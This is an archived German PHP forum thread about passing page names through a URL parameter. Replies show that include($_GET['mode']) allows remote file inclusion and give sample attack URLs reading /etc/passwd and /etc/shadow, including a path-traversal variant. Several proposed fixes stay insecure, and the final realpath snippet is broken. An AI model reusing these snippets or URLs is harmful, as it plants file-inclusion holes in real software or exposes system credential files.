Vollstndige Version anzeigen : Mode
Hi.
wie mach ich die links so:
index.php?mode=register ?
Danke. Bis denne
Corvin Grning
12-06-2004, 14:46
Ich glaube ich weiss, was du vor hast:
include($_GET['mode']);
http://tut.php-q.net/frames.html
das knnte dir helfen
Original geschrieben von Corvin Grning
include($_GET['mode']);
Aufruf:
index.php?mode=http%3A%2F%2Fwww.example.com%2Fb%F6ses_skript.txt
;)
Kein Problem. Einfach diese Abfrage einbauen ;-)
$mode=strip_tags($_GET['mode']);
if(file_exists($mode)){
include($mode);
}
else{
include("default.txt");
}
index.php?mode=/etc/passwd
index.php?mode=/etc/shadow
*g*
Danke, Leute. Echt netter support.;)
Original geschrieben von bazubi
index.php?mode=/etc/passwd
index.php?mode=/etc/shadow
*g*
Dann machen wir halt noch einen Ordner "seiten" in den alle Dateien reinkommen, die wir includen wollen ;-)
$mode=strip_tags($_GET['mode']);
if(file_exists($mode)){
include("./seiten/" . $mode);
}
else{
include("./seiten/default.txt");
}
Ist trotzdem noch nicht sicher!
index.php?mode=../../../../../../../../../../../../etc/passwd
Die ../../ kann man beliebig verlngern - stren nicht weiter wenn es ein paar zuviel sind!
Einfach Array-Include nehmen, dann hat man genau unter Kontrolle was geladen werden kann und was nicht, siehe dazu http://tut.php-q.net/frames.html
Oder das ganze mit realpath auflsen.
if (file_exists('./seiten/' . realpath($_GET['mode'])) {
include ...
}
vBulletin v3.0.7, Copyright ©2000-2005, Jelsoft Enterprises Ltd.